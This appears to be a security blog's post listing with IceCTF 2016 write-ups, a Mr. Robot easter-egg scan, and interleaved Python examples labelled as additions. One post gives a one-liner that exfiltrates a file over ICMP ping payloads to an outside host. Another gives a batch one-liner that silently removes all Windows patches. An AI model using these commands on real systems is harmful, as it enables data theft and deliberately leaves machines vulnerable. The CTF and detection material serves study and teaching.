Posts

  1. IceCTF 2016 - Demo


    Challenge description:

    I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell. The source for this challenge was provided:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <libgen.h>
    #include <string.h>
    
    /* Runs with the binary's effective group (it is setgid) and hands out a shell. */
    void give_shell() {
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }
    
    int main(int argc, char *argv[]) {
        /* The "trial check": trusts the _ environment variable, which the parent
           shell sets and the caller controls. strncmp with 6 also compares the
           terminating NUL, so the basename has to be exactly "icesh". */
        if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
        }
        else {
            printf("I'm sorry, your free trial has ended.\n");
        }
        return 0;
    }
    

    So to get the flag we need to make the _ shell variable equal icesh. In bash, _ is always set to the program name of the command being run, so I decided to use a different shell to see what would happen.

    sh
    ls icesh; /home/demo/demo
    cat flag.txt
    IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
    

    And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

  2. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd actually has a feature (-r) to reverse a hexdump back into the original file; from there I identified the resulting file's format with the file command. It was a lzip archive. Extracting the lzip resulted in the following image:

    (image: thor)

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

    → xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    → lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
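    As an added example (my own code, not part of the original writeup), here is the same two-step procedure in Python: undo an xxd-style hexdump the way xxd -r does, then identify the result by its magic bytes the way file does. The sample dump is a constructed JFIF header, not the challenge file, and the magic table is a small stand-in for libmagic.

```python
import re

# Magic numbers `file` would report for the formats met in this challenge, plus two
# common neighbours (PNG, gzip) so the helper generalises a little beyond it.
MAGIC = [
    (b"LZIP", "lzip compressed data"),
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (b"\x1f\x8b", "gzip compressed data"),
]

# Constructed sample: the first 20 bytes of a JFIF header in xxd's default layout.
SAMPLE_DUMP = """\
00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0048  ......JFIF.....H
00000010: 0048 0000                                .H..
"""

# offset, colon, then hex groups; the double space before the ASCII column stops the match
HEX_LINE = re.compile(r"^([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2,4}(?:\s|$))+)")

def xxd_reverse(dump):
    """Undo an xxd hexdump like `xxd -r`: parse the offset and hex groups of each line,
    ignore the ASCII column, and honour offsets (gaps are zero-filled)."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue  # xxd -r also skips lines it cannot parse
        offset = int(m.group(1), 16)
        chunk = bytes.fromhex(re.sub(r"\s", "", m.group(2)))
        if offset > len(out):
            out.extend(b"\x00" * (offset - len(out)))
        out[offset:offset + len(chunk)] = chunk
    return bytes(out)

def identify(data):
    """A tiny stand-in for `file`: report the first matching magic number."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "data"
```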
    
  3. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    (image: vape nation)

    With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

    (image: solved nation)

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}
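    An added example, not from the original post or from Stegsolve: it builds a small constructed RGB image with a message hidden in the least significant bit of the green channel, then pulls out "green plane 0" the way Stegsolve displays it. Pixel values and the message are made up.

```python
# Constructed 16x4 RGB "image" (row-major list of (r, g, b) tuples). The cover pixel
# values and the hidden message are made up for this example.
WIDTH, HEIGHT = 16, 4
COVER = [((x * 7) % 256, (y * 50 + x * 3) % 256, 120) for y in range(HEIGHT) for x in range(WIDTH)]
MESSAGE = b"flag{hi}"  # 8 bytes = 64 bits, one bit per pixel, exactly fills the image

def embed_green_lsb(pixels, message):
    """Hide `message` (MSB first) in the least significant bit of the green channel,
    left to right, top to bottom. Bit 0 changes each green value by at most 1, which is
    why the picture looks untouched and only a bit-plane view exposes the payload."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(pixels):
        raise ValueError("message does not fit in the image")
    out = list(pixels)
    for idx, bit in enumerate(bits):
        r, g, b = out[idx]
        out[idx] = (r, (g & 0xFE) | bit, b)
    return out

def plane(pixels, channel, bit):
    """Stegsolve-style bit plane: one 0/1 per pixel for a channel (0=R, 1=G, 2=B) and
    a bit index. Stegsolve's "Green plane 0" is plane(pixels, 1, 0)."""
    return [(px[channel] >> bit) & 1 for px in pixels]

def plane_to_bytes(bits):
    """Pack a plane back into bytes, MSB first, dropping any trailing partial byte."""
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))

def render(bits, width):
    """ASCII rendering of a plane as the Stegsolve viewer would show it ('#' = 1)."""
    rows = [bits[i:i + width] for i in range(0, len(bits), width)]
    return "\n".join("".join("#" if b else "." for b in row) for row in rows)

STEGO = embed_green_lsb(COVER, MESSAGE)
```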

  4. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IPs and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53.

    (image: ip)

    I decided to scan that host with nmap and got the following results:

    → sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net:

    (image: irc)

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the role of Darlene and entered what she said in the show:

    (image: input)

    Here is the response I got:

    (image: response)

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown. Only "wait for my instructions" was. The scene after shows a news article from Business Insider titled "FBI gives up Blackberry for Android". I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  5. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of Metasploit and automation using pymetasploit.

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  6. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. It shows how to exfiltrate data from a network using the padding of ICMP echo request packets.

    Sending data

    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This will base64 encode important-data.txt and then stuff the encoded data into ping's payload 16 bytes at a time, via the -p pattern option.

    Obviously you should change the IP before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short little script that takes an output file name as the first argument and an optional interface name to listen on as the second argument.
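    Added example, my own and not the author's scapy script: a pure-Python parser that walks raw IPv4/ICMP packets as a defender would pull them from a capture, flags echo requests whose pattern area is base64 text rather than ping's default filler, and reassembles the chunks. It assumes Linux ping's payload layout (timestamp in the first 16 data bytes, the -p pattern filling the last 16), and the packets are constructed inline.

```python
import base64
import struct

CHUNK = 16  # `xxd -ps -c 16` hands ping 16 bytes per line, so each packet carries 16 bytes
B64 = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

def build_echo_request(chunk, ident, src=b"\x0a\x00\x00\x05", dst=b"\x08\x08\x08\x08"):
    """Constructed packet shaped like what `ping -c1 -s32 -p <hex>` emits on Linux:
    IPv4 header, ICMP echo header, then 32 data bytes. Assumption: ping overwrites the
    first 16 data bytes with its timestamp and the repeated pattern fills the rest, so
    the chunk sits in the last 16 bytes. Every `ping -c1` starts again at seq 1."""
    data = b"\x00" * 16 + chunk
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, 1) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0, src, dst)
    return ip + icmp  # checksums left at 0: the parser does not verify them

def icmp_echo_data(packet):
    """Return the echo-request data bytes, or None if this is not an IPv4 ICMP echo request."""
    if len(packet) < 28 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    if len(icmp) < 8 or icmp[0] != 8:
        return None
    return icmp[8:]

def looks_like_exfil(data):
    """Detection heuristic: Linux ping's normal filler after the timestamp is a run of
    incrementing bytes (0x10, 0x11, ...); 16 trailing bytes of pure base64 text are not."""
    return len(data) >= 2 * CHUNK and all(b in B64 for b in data[-CHUNK:])

def reassemble(packets):
    """Forensic reconstruction from a capture: keep flagged packets in arrival order
    (sequence numbers are useless here, see build_echo_request) and base64-decode."""
    chunks = [d[-CHUNK:] for d in map(icmp_echo_data, packets) if d and looks_like_exfil(d)]
    return base64.b64decode(b"".join(chunks))

# Constructed traffic: a 24-byte file base64-encodes to exactly 32 characters, i.e. two
# full chunks (the `base64` tool's trailing newline would add a third, partial one).
SECRET = b"top secret: password123!"
ENCODED = base64.b64encode(SECRET)
SAMPLE = [build_echo_request(ENCODED[0:16], 0x1111),
          build_echo_request(bytes(range(16, 32)), 0x2222),  # an ordinary ping in between
          build_echo_request(ENCODED[16:32], 0x3333)]
```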

    That's all for now.

  7. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

  8. iPhone: Installing apt without a GUI


    Usually to get apt you need to launch Cydia. If you only have an ssh connection in and would like apt you can go to http://apt.saurik.com/debs/ and grab berkeleydb_4.6.21-5_iphoneos-arm.deb and apt7_0.7.25.3-8_iphoneos-arm.deb. Scp them over and run dpkg -i apt7_0.7.25.3-8_iphoneos-arm.deb then dpkg -i berkeleydb_4.6.21-5_iphoneos-arm.deb. There you go. You can apt-get all of the things now.

  9. Uninstall all installed Windows KB patches in one line of batch


    I was trying to unpatch something to make it vulnerable and I was getting impatient trying to uninstall the correct patch, so I got creative and came up with a one-liner to uninstall all of them at once. Or at least all of the ones that have working uninstallers and no other dependencies... The uninstallers are all called spuninst.exe and are somewhere in \WINDOWS (under a bunch of sub folders that start with $NtUninstall), so I give you the following command:

    for /F %a in ('dir /B /S /A \WINDOWS ^| findstr spuninst.exe ^| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Keep running this until it does not print anything, and then all of the patches will be gone on reboot. Happy unpatching!

    ... bonus

    for /L %b in (0,0,1) do @for /F %a in ('dir /B /S /A \WINDOWS ^| findstr spuninst.exe ^| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Just keep running that until the screen is blank.